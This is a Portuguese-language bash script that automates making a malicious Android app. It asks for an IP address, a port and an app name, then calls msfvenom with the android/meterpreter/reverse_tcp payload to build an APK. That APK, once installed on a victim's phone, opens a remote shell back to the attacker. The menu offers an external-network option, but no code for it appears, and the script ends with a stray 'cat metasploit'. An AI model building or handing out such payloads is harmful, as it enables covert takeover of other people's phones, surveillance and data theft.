#!/bin/bash
#historico
# ------------------------------------------------------------------------
# ESTA FERRAMENTA ELA PERMITE GERAR UM PAYLOAD PARA ANDROID AUTOMATIZADO *
#                    CREATE BY : paulo                                   *
#-------------------------------------------------------------------------
# CORES
CYAN="\033[01;36m"
RED="\033[01;31m"
PRETO="\033[30m"
CLARO="\033[33m"

#   CORES
echo "---------------------------------------------------*"
echo "[*]SEJA BEM VINDO AO GERADOR DE PAYLOAD[*]"
echo "---------------------------------------------------*"
echo
echo -e "${CYAN}*******************************************************************************"
echo -e "${RED}** [1]- REDE INTERNA  **"   "${PRETO} ***ANDROID***  " ENGLISH
echo -e "${RED}** [2]- REDE EXTERNA  **"  "${PRETO}  ***ANDROID*** " PORTUGUES
echo -e "${CYAN}*******************************************************************************"
echo "[*]qual opcao deseja executar[*]?"
read opcao
#CRINADO PAYLOAD ANDROID EM REDE INTERNA 
if [ "$opcao" -eq "1" ]
then
clear
echo -e "${RED}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "           CRIACAO DO PAYLOAD          * "
echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo -e "${CYAN}[*]digite o ip interno *ETH0* [*]"
read interno
echo "[*]Digite a porta aberta[*] "
read porta
echo "[*]Digite o nome do aplicativo[*] "
read apk
WHITE="\033[01;37m"
CLARO="\033[33m"
PRETO="\033[30m"
echo -e "${CLARO}CRIANDO PAYLOAD, PODE DEMORAR ALGUNS SEGUNDOS..."
msfvenom -p android/meterpreter/reverse_tcp LHOST=$interno  LPORT=$porta R > $apk.apk
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo -e "${RED}**    PAYLOAD CRIADO COM SUCESSO      **"
echo -e "${RED}**    OBRIGADO POR USAR ESSA FERRAMENTA**"
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
sleep 3
clear
cat metasploit
